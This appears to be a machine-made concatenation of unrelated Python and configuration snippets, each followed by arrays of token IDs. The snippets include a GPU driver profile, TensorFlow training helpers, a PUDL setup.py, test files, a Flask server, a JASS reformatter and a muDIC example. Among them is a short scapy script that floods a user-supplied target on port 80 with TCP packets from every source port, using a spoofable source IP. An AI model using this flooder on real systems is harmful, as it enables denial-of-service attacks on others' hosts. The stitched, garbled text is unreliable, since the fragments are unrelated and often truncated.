'GL_EXT_texture_edge_clamp GL_EXT_texture_env_combine ' 'GL_EXT_texture_env_dot3 GL_EXT_texture_filter_anisotropic ' 'GL_EXT_texture_integer GL_EXT_texture_lod ' 'GL_EXT_texture_lod_bias GL_EXT_texture_mirror_clamp ' 'GL_EXT_texture_object GL_EXT_texture_shared_exponent ' 'GL_EXT_texture_sRGB 
GL_EXT_texture_sRGB_decode ' 'GL_EXT_texture_storage GL_EXT_texture_swizzle ' 'GL_EXT_timer_query GL_EXT_transform_feedback2 ' 'GL_EXT_vertex_array GL_EXT_vertex_array_bgra ' 'GL_EXT_vertex_attrib_64bit GL_EXT_x11_sync_object ' 'GL_EXT_import_sync_object GL_IBM_rasterpos_clip ' 'GL_IBM_texture_mirrored_repeat GL_KHR_debug ' 'GL_KTX_buffer_region GL_NV_bindless_multi_draw_indirect ' 'GL_NV_blend_equation_advanced GL_NV_blend_square ' 'GL_NV_compute_program5 GL_NV_conditional_render ' 'GL_NV_copy_depth_to_color GL_NV_copy_image ' 'GL_NV_depth_buffer_float GL_NV_depth_clamp ' 'GL_NV_draw_texture GL_NV_ES1_1_compatibility ' 'GL_NV_explicit_multisample GL_NV_fence GL_NV_float_buffer ' 'GL_NV_fog_distance GL_NV_fragment_program ' 'GL_NV_fragment_program_option GL_NV_fragment_program2 ' 'GL_NV_framebuffer_multisample_coverage ' 'GL_NV_geometry_shader4 GL_NV_gpu_program4 ' 'GL_NV_gpu_program4_1 GL_NV_gpu_program5 ' 'GL_NV_gpu_program5_mem_extended GL_NV_gpu_program_fp64 ' 'GL_NV_gpu_shader5 GL_NV_half_float GL_NV_light_max_exponent ' 'GL_NV_multisample_coverage GL_NV_multisample_filter_hint ' 'GL_NV_occlusion_query GL_NV_packed_depth_stencil ' 'GL_NV_parameter_buffer_object GL_NV_parameter_buffer_object2' ' GL_NV_path_rendering GL_NV_pixel_data_range ' 'GL_NV_point_sprite GL_NV_primitive_restart ' 'GL_NV_register_combiners GL_NV_register_combiners2 ' 'GL_NV_shader_atomic_counters GL_NV_shader_atomic_float ' 'GL_NV_shader_buffer_load GL_NV_shader_storage_buffer_object ' 'GL_ARB_sparse_texture GL_NV_texgen_reflection ' 'GL_NV_texture_barrier GL_NV_texture_compression_vtc ' 'GL_NV_texture_env_combine4 GL_NV_texture_expand_normal ' 'GL_NV_texture_multisample GL_NV_texture_rectangle ' 'GL_NV_texture_shader GL_NV_texture_shader2 ' 'GL_NV_texture_shader3 GL_NV_transform_feedback ' 'GL_NV_transform_feedback2 GL_NV_vdpau_interop ' 'GL_NV_vertex_array_range GL_NV_vertex_array_range2 ' 'GL_NV_vertex_attrib_integer_64bit ' 'GL_NV_vertex_buffer_unified_memory GL_NV_vertex_program ' 
'GL_NV_vertex_program1_1 GL_NV_vertex_program2 ' 'GL_NV_vertex_program2_option GL_NV_vertex_program3 ' 'GL_NVX_conditional_render GL_NVX_gpu_memory_info ' 'GL_SGIS_generate_mipmap GL_SGIS_texture_lod ' 'GL_SGIX_depth_texture GL_SGIX_shadow GL_SUN_slice_accum ' }, 'devices': [ { 'device_string': '', 'vendor_id': 4318.0, 'device_id': 3576.0, 'vendor_string': '' }], 'driver_bug_workarounds': ['clear_uniforms_before_first_program_use', 'disable_gl_path_rendering', 'init_gl_position_in_vertex_shader', 'init_vertex_attributes', 'remove_pow_with_constant_exponent', 'scalarize_vec_and_mat_constructor_args', 'use_current_program_after_successful_link', 'use_virtualized_gl_contexts'] }
[ 2, 15069, 1853, 383, 18255, 1505, 46665, 13, 1439, 2489, 10395, 13, 198, 2, 5765, 286, 428, 2723, 2438, 318, 21825, 416, 257, 347, 10305, 12, 7635, 5964, 326, 460, 307, 198, 2, 1043, 287, 262, 38559, 24290, 2393, 13, 198, 198, 2, ...
1.908676
7,238
#! /usr/bin/env python3 # vim: et:ts=4:sw=4:fenc=utf-8 from abc import ABC, abstractmethod from collections import defaultdict import re
[ 2, 0, 1220, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 2, 43907, 25, 2123, 25, 912, 28, 19, 25, 2032, 28, 19, 25, 69, 12685, 28, 40477, 12, 23, 198, 198, 6738, 450, 66, 1330, 9738, 11, 12531, 24396, 198, 198, 6738, 17268, 1330,...
2.685185
54
import os from os import path import json import shutil import tensorflow as tf import numpy as np # Importa cosas de Keras API from tensorflow.keras.optimizers import Adam, RMSprop from tensorflow.keras.models import Sequential from tensorflow.keras.utils import plot_model # Importa callbacks del modelo from training_utils.callbacks import TrainingCheckPoints from tensorflow.keras.callbacks import CSVLogger, TensorBoard # Importa cosas para graficar el entrenameinto from training_utils.training_graphs import graph_confusion_matrix from training_utils.training_graphs import graph_model_metrics # Function that continues the training of a model # Args: # path_to_model: path were to find the model and setup # dataset: tuple of tensorflow dataset of (train, test) # Method that starts the model training # Args: # setup: Dictionary with the model setup # model: the keras.Model architecture to train # dataset: tuple of tensorflow dataset of (train, test) # Metodo, que entrena un modelo ya compilado, implementa callbacks de # tensorboard, log a un archivo CSV y creacion de checkpoints cuando ocurre # mejoras en el loss, tambien grafica y crea matriz de confusion # Args: # compiled_model: keras.Model ya compilado # dataset: tuple of tensorflow dataset of (train, test) # opt: keras.Optimizer used in training # epochs: The number of epochs to train # initial_epoch: Epoch to start training, 0 for normal training # continue_train: if the model is continuing training # classes: array of classes that the model predict
[ 11748, 28686, 198, 6738, 28686, 1330, 3108, 198, 11748, 33918, 198, 11748, 4423, 346, 198, 198, 11748, 11192, 273, 11125, 355, 48700, 198, 11748, 299, 32152, 355, 45941, 198, 198, 2, 17267, 64, 8615, 292, 390, 17337, 292, 7824, 198, 673...
3.342612
467
#!/usr/bin/env python """Setup script to make PUDL directly installable with pip.""" import os from pathlib import Path from setuptools import find_packages, setup install_requires = [ 'coloredlogs', 'datapackage>=1.9.0', 'dbfread', 'goodtables', 'matplotlib', 'networkx>=2.2', 'numpy', 'pandas>=0.24', 'pyarrow>=0.14.0', 'pyyaml', 'scikit-learn>=0.20', 'scipy', 'sqlalchemy>=1.3.0', 'tableschema', 'tableschema-sql>=1.1.0', 'timezonefinder', 'xlsxwriter', ] # We are installing the PUDL module to build the docs, but the C libraries # required to build snappy aren't available on RTD, so we need to exclude it # from the installed dependencies here, and mock it for import in docs/conf.py # using the autodoc_mock_imports parameter: if not os.getenv('READTHEDOCS'): install_requires.append('python-snappy') doc_requires = [ 'doc8', 'sphinx', 'sphinx_rtd_theme', ] test_requires = [ 'bandit', 'coverage', 'doc8', 'flake8', 'flake8-docstrings', 'flake8-builtins', 'pep8-naming', 'pre-commit', 'pydocstyle', 'pytest', 'pytest-cov', 'nbval', ] readme_path = Path(__file__).parent / "README.rst" long_description = readme_path.read_text() setup( name='catalystcoop.pudl', description='An open data processing pipeline for public US utility data.', long_description=long_description, long_description_content_type='text/x-rst', use_scm_version=True, author='Catalyst Cooperative', author_email='pudl@catalyst.coop', maintainer='Zane A. 
Selvans', maintainer_email='zane.selvans@catalyst.coop', url="https://catalyst.coop/pudl", project_urls={ "Source": "https://github.com/catalyst-cooperative/pudl", "Documentation": "https://catalystcoop-pudl.readthedocs.io", "Issue Tracker": "https://github.com/catalyst-cooperative/pudl/issues", }, license='MIT', keywords=[ 'electricity', 'energy', 'data', 'analysis', 'mcoe', 'climate change', 'finance', 'eia 923', 'eia 860', 'ferc', 'form 1', 'epa ampd', 'epa cems', 'coal', 'natural gas', ], python_requires='>=3.7, <3.8.0a0', setup_requires=['setuptools_scm'], install_requires=install_requires, extras_require={ "doc": doc_requires, "test": test_requires, }, classifiers=[ 'Development Status :: 3 - Alpha', 'Environment :: Console', 'Intended Audience :: Science/Research', 'Intended Audience :: Developers', 'License :: OSI Approved :: MIT License', 'Natural Language :: English', 'Operating System :: OS Independent', 'Programming Language :: Python :: 3.7', 'Topic :: Scientific/Engineering', ], packages=find_packages('src'), package_dir={'': 'src'}, # package_data is data that is deployed within the python package on the # user's system. setuptools will get whatever is listed in MANIFEST.in include_package_data=True, # This defines the interfaces to the command line scripts we're including: entry_points={ 'console_scripts': [ 'pudl_data = pudl.workspace.datastore_cli:main', 'pudl_setup = pudl.workspace.setup_cli:main', 'pudl_etl = pudl.cli:main', 'datapkg_to_sqlite = pudl.convert.datapkg_to_sqlite:main', 'ferc1_to_sqlite = pudl.convert.ferc1_to_sqlite:main', 'epacems_to_parquet = pudl.convert.epacems_to_parquet:main', ] }, )
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 37811, 40786, 4226, 284, 787, 350, 8322, 43, 3264, 2721, 540, 351, 7347, 526, 15931, 198, 198, 11748, 28686, 198, 6738, 3108, 8019, 1330, 10644, 198, 198, 6738, 900, 37623, 10141, 1330, ...
2.324201
1,533
from BTrees import OOBTree from datetime import datetime, date, timedelta from persistent import Persistent from .vulnerability import Vulnerability import fcntl import glob import gzip import json import logging import os import os.path as p import requests import transaction import ZODB import ZODB.FileStorage DEFAULT_MIRROR = 'https://nvd.nist.gov/feeds/json/cve/1.1/' DEFAULT_CACHE_DIR = '~/.cache/vulnix' _log = logging.getLogger(__name__)
[ 6738, 22205, 6037, 1330, 440, 9864, 27660, 198, 6738, 4818, 8079, 1330, 4818, 8079, 11, 3128, 11, 28805, 12514, 198, 6738, 16218, 1330, 9467, 7609, 198, 6738, 764, 85, 40920, 1330, 569, 40920, 198, 11748, 277, 66, 429, 75, 198, 11748, ...
2.993377
151
from scapy.all import *

# Simple TCP packet flooder: crafts one packet per source port, dport 80,
# and loops forever.
# NOTE(review): this is a traffic-flooding tool; run it only against hosts
# you are authorized to test.
source_ip = input("Source IP: ")
target_ip = input("Target IP: ")

sent_count = 1
while True:
    # Cycle through every source port, sending one packet each.
    for source_port in range(1, 65535):
        packet = IP(src=source_ip, dst=target_ip) / TCP(sport=source_port, dport=80)
        send(packet, inter=.0001)
        print("Packet Sent ", sent_count)
        sent_count += 1
[ 6738, 629, 12826, 13, 439, 1330, 1635, 198, 198, 10677, 796, 5128, 7203, 7416, 6101, 25, 366, 8, 198, 16793, 796, 5128, 7203, 21745, 6101, 25, 366, 8, 198, 198, 72, 28, 16, 198, 4514, 6407, 25, 198, 220, 220, 220, 329, 12351, 634,...
2.025641
156
import hashlib import unittest from colicoords.cell import Cell, CellList from colicoords.preprocess import data_to_cells from test import testcase from test.test_functions import load_testdata if __name__ == '__main__': unittest.main()
[ 11748, 12234, 8019, 201, 198, 11748, 555, 715, 395, 201, 198, 6738, 951, 3713, 3669, 13, 3846, 1330, 12440, 11, 12440, 8053, 201, 198, 6738, 951, 3713, 3669, 13, 3866, 14681, 1330, 1366, 62, 1462, 62, 46342, 201, 198, 6738, 1332, 1330...
2.865169
89
# --------------------------------------------------------------------------- # # Importing section # --------------------------------------------------------------------------- # import os import sys import argparse import logging import json from classes.alerts import SlackClient from influxdb import InfluxDBClient from classes.data_manager import DataManager # --------------------------------------------------------------------------- # # Functions # -----------------------------------------------------------------------------# # --------------------------------------------------------------------------- # # Main # --------------------------------------------------------------------------- # if __name__ == "__main__": # --------------------------------------------------------------------------- # # Configuration file # --------------------------------------------------------------------------- # arg_parser = argparse.ArgumentParser() arg_parser.add_argument("-c", help="configuration file") arg_parser.add_argument("-l", help="log file (optional, if empty log redirected on stdout)") args = arg_parser.parse_args() config_file = args.c if os.path.isfile(config_file) is False: print('\nATTENTION! 
Unable to open configuration file %s\n' % config_file) sys.exit(1) cfg = json.loads(open(args.c).read()) conns_cfg = json.loads(open(cfg['connectionsFile']).read()) cfg.update(conns_cfg) # --------------------------------------------------------------------------- # # Set logging object # --------------------------------------------------------------------------- # if not args.l: log_file = None else: log_file = args.l logger = logging.getLogger() logging.basicConfig(format='%(asctime)-15s::%(levelname)s::%(funcName)s::%(message)s', level=logging.INFO, filename=log_file) # --------------------------------------------------------------------------- # # Starting program # --------------------------------------------------------------------------- # logger.info("Starting program") # --------------------------------------------------------------------------- # # InfluxDB connection # --------------------------------------------------------------------------- # logger.info('Connection to InfluxDb server on socket [%s:%s]' % (cfg['influxDB']['host'], cfg['influxDB']['port'])) try: influx_client = InfluxDBClient(host=cfg['influxDB']['host'], port=cfg['influxDB']['port'], password=cfg['influxDB']['password'], username=cfg['influxDB']['user'], database=cfg['influxDB']['database'], ssl=cfg['influxDB']['ssl']) except Exception as e: logger.error('EXCEPTION: %s' % str(e)) sys.exit(3) logger.info('Connection successful') dm = DataManager(influx_client, cfg, logger) # Download files from the FTP server if cfg['ftp']['enabled'] is True: logger.info('Download data from FTP server') dm.open_ftp_connection() dm.download_remote_files() # Insert data into InfluxDB if cfg['influxDB']['dataImporting'] is True: logger.info('Importing in InfluxDB of raw data related to files in %s' % cfg['ftp']['localFolders']['tmp']) dm.insert_data() # Delete files correctly handled on the FTP server and close the FTP connection if cfg['ftp']['enabled'] is True: if cfg['ftp']['deleteRemoteFile'] is True: 
logger.info('Delete handled files from FTP server') dm.delete_remote_files() dm.close_ftp_connection() # Slack alert if cfg['alerts']['slack']['enabled'] is True: slack_msg() logger.info("Ending program")
[ 2, 16529, 32284, 1303, 198, 2, 17267, 278, 2665, 198, 2, 16529, 32284, 1303, 198, 198, 11748, 28686, 198, 11748, 25064, 198, 11748, 1822, 29572, 198, 11748, 18931, 198, 11748, 33918, 198, 198, 6738, 6097, 13, 44598, 82, 1330, 36256, 117...
3.174236
1,211
#!/usr/bin/env python3 # -*- coding: utf-8 -*- __author__ = 'ipetrash' import re DEBUG = False lines = """ function II1I1_II takes real II1I1__I returns nothing local real II1I1_1I local real st=TimerGetElapsed(II1I___I) if st<=0 then set II1I___I=CreateTimer() call TimerStart(II1I___I,1000000,false,null) endif if(II1I1__I>0)then loop set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st exitwhen II1I1_1I<=0 if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then call TriggerSleepAction(0.1*II1I1_1I) else call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL) endif endloop endif endfunction """.strip().splitlines() stack = [] items = [] for line in lines: if line.startswith('globals'): stack.append('globals') elif line.startswith('endglobals'): stack.pop(-1) stack.append('endglobals') elif line.startswith('function'): stack.append('function') elif line.startswith('endfunction'): stack.pop(-1) stack.append('endfunction') elif line.startswith('loop'): stack.append('loop') elif line.startswith('endloop'): stack.pop(-1) stack.append('endloop') elif line.startswith('if'): stack.append('if') elif line.startswith('elseif'): stack.pop(-1) stack.append('elseif') elif line.startswith('else'): stack.pop(-1) stack.append('else') elif line.startswith('endif'): stack.pop(-1) stack.append('endif') else: stack.append(line[:8] + '...') indent = len(stack) - 1 line = merge_str_literal(line) items.append(' ' * indent + line) DEBUG and print(f'{indent}. 
{line!r}', stack) # Add empty line after endglobals and endfunction if line.startswith('endglobals') or line.startswith('endfunction'): items.append('') if stack[-1] not in ['globals', 'function', 'loop', 'if', 'elseif', 'else']: stack.pop(-1) new_text = '\n'.join(items).strip() print(new_text) """ function II1I1_II takes real II1I1__I returns nothing local real II1I1_1I local real st=TimerGetElapsed(II1I___I) if st<=0 then set II1I___I=CreateTimer() call TimerStart(II1I___I,1000000,false,null) endif if(II1I1__I>0)then loop set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st exitwhen II1I1_1I<=0 if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then call TriggerSleepAction(0.1*II1I1_1I) else call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL) endif endloop endif endfunction """
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 834, 9800, 834, 796, 705, 541, 21879, 1077, 6, 628, 198, 11748, 302, 628, 198, 30531, 796, 10352, 628, 198, ...
2.089457
1,252
from common.commons import * DATA_PATH = os.environ["DATA_PATH"]
[ 6738, 2219, 13, 9503, 684, 1330, 1635, 198, 26947, 62, 34219, 796, 28686, 13, 268, 2268, 14692, 26947, 62, 34219, 8973, 198 ]
2.954545
22
# -*- coding: utf-8 -*-
import os
import sys

import tensorflow as tf
import numpy as np
import data_utils

from translate import Transliteration
from flask import Flask, request, jsonify

# Load the transliteration model once, at import time; every request served
# by this process shares the same instance.
transliteration = Transliteration()

app = Flask(__name__)  # WSGI application object for this service.
# Return JSON as raw UTF-8 instead of escaping non-ASCII characters.
app.config['JSON_AS_ASCII'] = False

if __name__ == "__main__":
    # Development server: listen on all interfaces, port 80, without the
    # reloader (reloading would build the model a second time).
    app.run(debug=True, host='0.0.0.0', port=80, use_reloader=False)
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 11748, 28686, 198, 11748, 25064, 198, 11748, 11192, 273, 11125, 355, 48700, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 1366, 62, 26791, 198, 6738, 15772, 1330, 3602, ...
2.72
150
from django.apps import AppConfig
[ 6738, 42625, 14208, 13, 18211, 1330, 2034, 16934, 628 ]
3.888889
9
""" Interface to the env_build.xml file. This class inherits from EnvBase """ from CIME.XML.standard_module_setup import * from CIME.XML.env_base import EnvBase logger = logging.getLogger(__name__)
[ 37811, 198, 39317, 284, 262, 17365, 62, 11249, 13, 19875, 2393, 13, 220, 770, 1398, 10639, 896, 422, 2039, 85, 14881, 198, 37811, 198, 6738, 327, 12789, 13, 55, 5805, 13, 20307, 62, 21412, 62, 40406, 1330, 1635, 198, 198, 6738, 327, ...
2.871429
70
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2019, Battelle Memorial Institute.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This material was prepared as an account of work sponsored by an agency of
# the United States Government.  Neither the United States Government nor the
# United States Department of Energy, nor Battelle, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors expressed
# herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY operated by
# BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}

import datetime
import logging
import os
import sys
import statistics

from volttron.platform.vip.agent import Agent, RPC, Core
from volttron.platform.agent import utils
from volttron.platform.agent.utils import get_aware_utc_now

utils.setup_logging()
_log = logging.getLogger(__name__)
__version__ = '1.0'


def log_statistics(config_path, **kwargs):
    """Build a LogStatisticsAgent from a configuration file.

    Loads the agent configuration found at *config_path* and returns a
    LogStatisticsAgent constructed from it.

    :param config_path: Path to a configuration file.
    :type config_path: str
    :returns: LogStatisticsAgent agent instance
    :rtype: LogStatisticsAgent
    """
    return LogStatisticsAgent(utils.load_config(config_path), **kwargs)


def main(argv=sys.argv):
    """Main method called by the platform."""
    utils.vip_main(log_statistics, identity='platform.logstatisticsagent')


if __name__ == '__main__':
    # Entry point for script
    try:
        sys.exit(main())
    except KeyboardInterrupt:
        pass
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 22935, 90, 198, 2, 43907, 25, 900, 277, 12685, 28, 40477, 12, 23, 10117, 28, 29412, 1509, 28, 19, 40379, 28, 19, 39747, 28, 19, 2123, 25, 198, 2, 198, 2, 15069, 13130, ...
3.626387
811
from rest_framework.serializers import ModelSerializer from .models import Place, Status, OSType, Stock, ComputerStock
[ 6738, 1334, 62, 30604, 13, 46911, 11341, 1330, 9104, 32634, 7509, 198, 198, 6738, 764, 27530, 1330, 8474, 11, 12678, 11, 440, 2257, 2981, 11, 10500, 11, 13851, 26207, 628, 628, 628 ]
3.90625
32
# -*- coding: utf-8 -*- # # Copyright 2012-2015 Spotify AB # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from helpers import unittest, in_parse import luigi import luigi.interface import json import collections
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 2, 198, 2, 15069, 2321, 12, 4626, 26778, 9564, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 345, 743,...
3.637755
196
# -*- coding: UTF-8 -*- import logging from typing import List from echoscope.config import config from echoscope.util import mysql_util, str_util, log_util from echoscope.model import ds_model, config_model from echoscope.source import source
[ 2, 532, 9, 12, 19617, 25, 41002, 12, 23, 532, 9, 12, 198, 198, 11748, 18931, 198, 6738, 19720, 1330, 7343, 198, 198, 6738, 304, 354, 40326, 13, 11250, 1330, 4566, 198, 6738, 304, 354, 40326, 13, 22602, 1330, 48761, 62, 22602, 11, ...
3.25
76
# last edited: 10/08/2017, 10:25 import os, sys, glob, subprocess from datetime import datetime from PyQt4 import QtGui, QtCore import math #from XChemUtils import mtztools import XChemDB import XChemRefine import XChemUtils import XChemLog import XChemToolTips import csv try: import gemmi import pandas except ImportError: pass #def get_names_of_current_clusters(xce_logfile,panddas_directory): # Logfile=XChemLog.updateLog(xce_logfile) # Logfile.insert('parsing {0!s}/cluster_analysis'.format(panddas_directory)) # os.chdir('{0!s}/cluster_analysis'.format(panddas_directory)) # cluster_dict={} # for out_dir in sorted(glob.glob('*')): # if os.path.isdir(out_dir): # cluster_dict[out_dir]=[] # found_first_pdb=False # for folder in glob.glob(os.path.join(out_dir,'pdbs','*')): # xtal=folder[folder.rfind('/')+1:] # if not found_first_pdb: # if os.path.isfile(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb') ): # cluster_dict[out_dir].append(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb')) # found_first_pdb=True # cluster_dict[out_dir].append(xtal) # return cluster_dict
[ 2, 938, 13012, 25, 838, 14, 2919, 14, 5539, 11, 838, 25, 1495, 198, 198, 11748, 28686, 11, 25064, 11, 15095, 11, 850, 14681, 198, 6738, 4818, 8079, 1330, 4818, 8079, 198, 6738, 9485, 48, 83, 19, 1330, 33734, 8205, 72, 11, 33734, 1...
2.102446
654
# -*- coding: utf-8 -*- """ Global app forms """ # Standard Library import re # Django Library from django import forms from django.contrib.auth.forms import UserChangeForm, UserCreationForm from django.utils.translation import ugettext_lazy as _ # Thirdparty Library from dal import autocomplete # Localfolder Library from ..models import PyCompany, PyCountry, PyUser from .partner import PartnerForm # ========================================================================== # # ========================================================================== #
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 37811, 198, 22289, 598, 5107, 198, 37811, 198, 2, 8997, 10074, 198, 11748, 302, 198, 198, 2, 37770, 10074, 198, 6738, 42625, 14208, 1330, 5107, 198, 6738, 42625, 14208, ...
4.237037
135
from unittest import mock import pytest from django.http import HttpRequest from rest_framework.response import Response from rest_framework.test import APIClient from drf_viewset_profiler.middleware import LineProfilerViewSetMiddleware
[ 6738, 555, 715, 395, 1330, 15290, 198, 198, 11748, 12972, 9288, 198, 6738, 42625, 14208, 13, 4023, 1330, 367, 29281, 18453, 198, 6738, 1334, 62, 30604, 13, 26209, 1330, 18261, 198, 6738, 1334, 62, 30604, 13, 9288, 1330, 3486, 2149, 75, ...
3.641791
67
# This allows for running the example when the repo has been cloned import sys from os.path import abspath sys.path.extend([abspath(".")]) # Example code follows import logging import numpy as np import matplotlib.pyplot as plt import muDIC.vlab as vlab import muDIC as dic """ This example case runs an experiment where a deformation gradient is used to deform a synthetically generated speckle, the speckle is then down sampled by a factor of four and sensor artifacts are included. The analysis is then performed and the resulting deformation gradient field is compared to the one used to deform the images """ # Set the amount of info printed to terminal during analysis logging.basicConfig(format='%(name)s:%(levelname)s:%(message)s', level=logging.INFO) show_results = False # Define the image you want to analyse n_imgs = 2 image_shape = (500, 500) downsample_factor = 4 super_image_shape = tuple(dim * downsample_factor for dim in image_shape) # Make a speckle image speckle_image = vlab.rosta_speckle(super_image_shape, dot_size=4, density=0.5, smoothness=2.0) # Make an image deformed F = np.array([[1.01,0],[0.01,1.0]]) image_deformer = vlab.imageDeformer_from_defGrad(F) # Make an image down-sampler including downscaling, fill-factor and sensor grid irregularities downsampler = vlab.Downsampler(image_shape=super_image_shape, factor=downsample_factor, fill=.95, pixel_offset_stddev=0.05) # Make a noise injector producing 2% gaussian additive noise noise_injector = vlab.noise_injector("gaussian", sigma=.02) # Make an synthetic image generation pipeline image_generator = vlab.SyntheticImageGenerator(speckle_image=speckle_image, image_deformer=image_deformer, downsampler=downsampler, noise_injector=noise_injector, n=n_imgs) # Put it into an image stack image_stack = dic.ImageStack(image_generator) # Now, make a mesh. 
Make sure to use enough elements mesher = dic.Mesher(deg_n=3, deg_e=3,type="spline") #mesh = mesher.mesh(image_stack) # Use this if you want to use a GUI mesh = mesher.mesh(image_stack,Xc1=50,Xc2=450,Yc1=50,Yc2=450,n_ely=8,n_elx=8, GUI=False) # Prepare the analysis input and initiate the analysis input = dic.DICInput(mesh, image_stack) input.tol = 1e-6 input.interpolation_order = 4 dic_job = dic.DICAnalysis(input) results = dic_job.run() # Calculate the fields for later use. Seed is used when spline elements are used and upscale is used for Q4. fields = dic.Fields(results, seed=101,upscale=10) # We will now compare the results from the analysis to the deformation gradient which the image was deformed by if show_results: plt.figure() plt.imshow(F[0,0] - fields.F()[0, 0,0, :, :, 1], cmap=plt.cm.magma) plt.xlabel("Element e-coordinate") plt.ylabel("Element n-coordinate") plt.colorbar() plt.title("Difference in deformation gradient component 0,0 within the element") fig1 = plt.figure() ax1 = fig1.add_subplot(111) #line1 = ax1.plot(res_field[:, 50], label="correct") line2 = ax1.plot(fields.F()[0, 0,0, :, 50, 1], label="DIC") ax1.set_xlabel("element e-coordinate") ax1.set_ylabel("Deformation gradient component 0,0 []") ax2 = fig1.add_subplot(111, sharex=ax1, frameon=False) line3 = ax2.plot(F[0,0] - fields.F()[0, 0,0, :, 50, 1], "r--", label="difference") ax2.yaxis.tick_right() ax2.yaxis.set_label_position("right") ax2.set_ylabel("Deviation []") plt.title("Deformation gradient component 0,0") fig1.legend() plt.show()
[ 2, 770, 3578, 329, 2491, 262, 1672, 618, 262, 29924, 468, 587, 537, 12004, 198, 11748, 25064, 198, 6738, 28686, 13, 6978, 1330, 2352, 6978, 198, 17597, 13, 6978, 13, 2302, 437, 26933, 397, 2777, 776, 7203, 19570, 12962, 198, 198, 2, ...
2.653473
1,339
mongo = { "user": "", "passwd": "", "db": "ghtorrent" } perspective_api_key = ""
[ 76, 25162, 796, 1391, 366, 7220, 1298, 366, 1600, 366, 6603, 16993, 1298, 366, 1600, 366, 9945, 1298, 366, 456, 13165, 1156, 1, 1782, 198, 19276, 806, 425, 62, 15042, 62, 2539, 796, 13538, 198 ]
2.314286
35
from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory from tests.unit.dataactvalidator.utils import number_of_errors, query_columns _FILE = 'fabs38_detached_award_financial_assistance_2' def test_success(database): """ AwardingOfficeCode must be six characters long. """ det_award_1 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAAAA') det_award_2 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='111111') det_award_3 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAA111') det_award_4 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='') det_award_5 = DetachedAwardFinancialAssistanceFactory(awarding_office_code=None) errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2, det_award_3, det_award_4, det_award_5]) assert errors == 0 def test_failure(database): """ AwardingOfficeCode must be six characters long. """ det_award_1 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAA1') det_award_2 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAAAAA') errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2]) assert errors == 2
[ 6738, 5254, 13, 20850, 13, 7890, 529, 7295, 13, 22584, 1749, 13, 301, 3039, 1330, 4614, 2317, 32, 904, 43621, 8021, 9311, 22810, 198, 6738, 5254, 13, 20850, 13, 7890, 529, 12102, 1352, 13, 26791, 1330, 1271, 62, 1659, 62, 48277, 11, ...
2.951276
431
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Tue Aug 31 22:48:21 2021 @author: apple """ import numpy as np import pandas as pd from HRP import seriation import fastcluster from scipy.cluster.hierarchy import fcluster from gap_statistic import OptimalK from backtest import df_to_matrix #HERC #Dataframe of returns
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 37811, 198, 41972, 319, 30030, 2447, 3261, 2534, 25, 2780, 25, 2481, 33448, 198, 198, 31, 9800, 25, 17180, 198, 3...
2.674419
129
